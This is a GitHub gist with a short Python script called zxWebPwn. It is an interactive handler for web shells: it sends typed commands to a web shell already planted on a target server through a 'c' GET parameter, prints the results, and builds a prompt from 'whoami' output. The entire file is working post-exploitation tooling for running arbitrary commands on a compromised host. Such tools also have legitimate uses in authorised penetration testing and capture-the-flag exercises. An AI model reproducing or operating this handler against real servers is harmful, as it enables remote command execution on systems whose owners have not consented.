Created
January 23, 2021 17:52
-
-
Save zxlim/68465045a57bf7b29949629cb6d2204f to your computer and use it in GitHub Desktop.
A very simple pseudo shell in Python to interact with web shells more effectively.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
################################################## | |
# Copyright (c) 2020 Zhao Xiang Lim. | |
# All Rights Reserved. | |
# Released under the MIT License. | |
# | |
# [ developer@zxlim.xyz ] | |
################################################## | |
from argparse import ArgumentParser | |
from urllib.parse import urlparse | |
import cmd | |
import requests | |
def execute_command(url, cmd): | |
try: | |
response = requests.get(url, params={"c": cmd}) | |
if response.status_code == 200: | |
return True, response.text | |
else: | |
return False, f"[!] HTTP Error Code: {response.status_code}\n\n{response.text}" | |
except requests.exceptions.ConnectionError: | |
return False, f"[!] Failed to connect to target URL: {url}" | |
def get_shell_prompt(url): | |
cmd_success, response = execute_command(url.geturl(), "whoami") | |
if cmd_success: | |
username = str(response.strip()) | |
suffix = "$" | |
if username.lower() == "root": | |
suffix = "#" | |
return f"[zxWebPwn] {username}@{url.hostname} {suffix} " | |
return False | |
class zxWebPwnHandler(cmd.Cmd): | |
def __init__(self, url, prompt = "[zxWebPwn] $ "): | |
super(zxWebPwnHandler, self).__init__() | |
self.url = url | |
self.prompt = str(prompt) | |
def do_help(self, line): | |
print("[zxWebPwn] You need no help. Just treat this as a 'normal' shell...") | |
def default(self, line): | |
if line in ("zxpwn-reload-user", "zxpwn-update-user"): | |
self.prompt = get_shell_prompt(self.url) | |
elif line.startswith("cd"): | |
# You can't really 'cd' since every command is executed in a new shell instance by the web shell. | |
print("[-] NOTE: This is not a normal shell! The command 'cd' will not work as expected.") | |
else: | |
cmd_success, response = execute_command(self.url.geturl(), line) | |
print(response) | |
def do_EOF(self, line): | |
print() | |
return True | |
def do_exit(self, line): | |
return True | |
def do_quit(self, line): | |
return True | |
def _parse_cmd_args(): | |
parser = ArgumentParser(description = "[zxWebPwn] A Web Shell Handler that improves your sanity. Sort of I guess.") | |
parser.add_argument("URL", type = str, help = "Full URL of web shell instance to interact with. Make sure it takes in commands via the 'c' GET parameter.") | |
return parser.parse_args() | |
def main(): | |
args = _parse_cmd_args() | |
url = urlparse(args.URL) | |
shell_prompt = get_shell_prompt(url) | |
if shell_prompt == False: | |
print(f"[!] Failed to connect to target URL: {url.geturl()}") | |
else: | |
print(f"[+] Connected to target at {url.hostname} ({url.port}/tcp)\n") | |
handler = zxWebPwnHandler(url, shell_prompt) | |
handler.cmdloop() | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment